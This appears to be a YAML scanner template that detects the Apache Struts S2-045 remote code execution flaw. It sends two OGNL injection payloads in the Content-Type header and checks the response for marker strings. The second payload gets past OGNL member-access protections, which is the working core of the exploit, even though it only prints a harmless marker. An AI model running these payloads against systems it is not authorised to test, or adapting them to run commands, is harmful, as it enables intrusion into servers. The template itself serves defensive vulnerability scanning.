id: struct-s2-045
type: list
info:
  name: Apache Struct S2-045 - RCE
  risk: High
variables:
  - pocs: |
      %{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("vul","13377331")}.multipart/form-data
      %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#o=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#o.println('['+'safetest'+']')).(#o.close())}
requests:
  - method: GET
    redirect: true
    url: >-
      {{.BaseURL}}{{.Path}}
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
      - Content-Type: >-
          {{.pocs}}
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "vul: 13377331")
      - >-
        StatusCode() == 200 && StringSearch("response", "[safetest]")

reference:
  author: theblackturtle
